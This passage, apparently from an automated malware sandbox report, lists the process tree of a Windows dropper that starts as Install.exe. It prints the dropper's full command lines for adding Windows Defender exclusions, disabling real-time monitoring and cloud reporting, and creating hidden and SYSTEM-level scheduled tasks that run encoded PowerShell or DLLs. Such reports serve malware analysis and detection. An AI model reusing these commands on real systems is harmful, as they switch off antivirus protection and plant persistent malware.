37 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 532 wrote to memory of 1368 532 cmd.exe 39 PID 1544 wrote to memory of 1536 1544 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe"C:\Users\Admin\AppData\Local\Temp\5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zS1A07.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\7zS2721.tmp\Install.exe.\Install.exe /CRyggdidWqCv "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1984
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:532 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:772
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1368
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsRTAbZRY" /SC once /ST 08:19:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsRTAbZRY"4⤵PID:1988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsRTAbZRY"4⤵PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjVqJkGFAiNaUEAvEn" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\FCTyizT.exe\" Ko /BNsite_idnsq 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1372
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D2CDD309-3EA5-43FD-BF04-4D539327BFBD} S-1-5-21-3297628651-743815474-1126733160-1000:HHVWDVKF\Admin:Interactive:[1]1⤵PID:568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:392
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1356
-
C:\Windows\system32\taskeng.exetaskeng.exe {E33B48FF-B08B-443D-A519-6B18A2E36EAD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:580
-
C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\FCTyizT.exeC:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\FCTyizT.exe Ko /BNsite_idnsq 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goIXvIzJY" /SC once /ST 02:37:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goIXvIzJY"3⤵PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goIXvIzJY"3⤵PID:1868
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1192
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1376
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmQpAYUsb" /SC once /ST 21:11:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmQpAYUsb"3⤵PID:1776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmQpAYUsb"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:323⤵PID:1056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:643⤵PID:1288
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:323⤵PID:828
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:324⤵PID:852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:643⤵PID:1748
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:644⤵PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\pNRMKCwFqwdxSFZt\otLxHSax\sEzdMkuTIearuRPL.wsf"3⤵PID:1976
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\pNRMKCwFqwdxSFZt\otLxHSax\sEzdMkuTIearuRPL.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1680 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:324⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:644⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:324⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:644⤵PID:560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:644⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:644⤵PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CTJjJnZaTLQnbGVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CTJjJnZaTLQnbGVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:324⤵PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:324⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WASabAiYZoPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:324⤵PID:284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gPtoEFCUU" /t REG_DWORD /d 0 /reg:644⤵PID:392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gVmmTejSMDqsC" /t REG_DWORD /d 0 /reg:644⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xTRsizlJSGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CTJjJnZaTLQnbGVB" /t REG_DWORD /d 0 /reg:324⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CTJjJnZaTLQnbGVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC" /t REG_DWORD /d 0 /reg:324⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC" /t REG_DWORD /d 0 /reg:644⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pNRMKCwFqwdxSFZt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsamRsKfc" /SC once /ST 10:36:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsamRsKfc"3⤵PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsamRsKfc"3⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1988
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1804
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1964
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MZObKWyefxVnmbFER" /SC once /ST 09:58:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\tMUvFJo.exe\" LR /mHsite_idEnN 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MZObKWyefxVnmbFER"3⤵PID:1468
-
-
-
C:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\tMUvFJo.exeC:\Windows\Temp\pNRMKCwFqwdxSFZt\UFnhWIcgSvJGGsa\tMUvFJo.exe LR /mHsite_idEnN 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjVqJkGFAiNaUEAvEn"3⤵PID:644
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:668
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1680
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gPtoEFCUU\hrjfUv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VHLBDothpetOaQE" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VHLBDothpetOaQE2" /F /xml "C:\Program Files (x86)\gPtoEFCUU\DmoaxjT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VHLBDothpetOaQE"3⤵PID:188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VHLBDothpetOaQE"3⤵PID:1568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FRyvzmFyKIKHHk" /F /xml "C:\Program Files (x86)\WASabAiYZoPU2\XvpffDl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KhpKPZOqlRJSL2" /F /xml "C:\ProgramData\CTJjJnZaTLQnbGVB\AUonNuq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BwDBMyJmAHoyGvPyR2" /F /xml "C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\GSFECHF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SCWXFRoLSAnycvArdss2" /F /xml "C:\Program Files (x86)\gVmmTejSMDqsC\yBLVjmE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1008
-
-
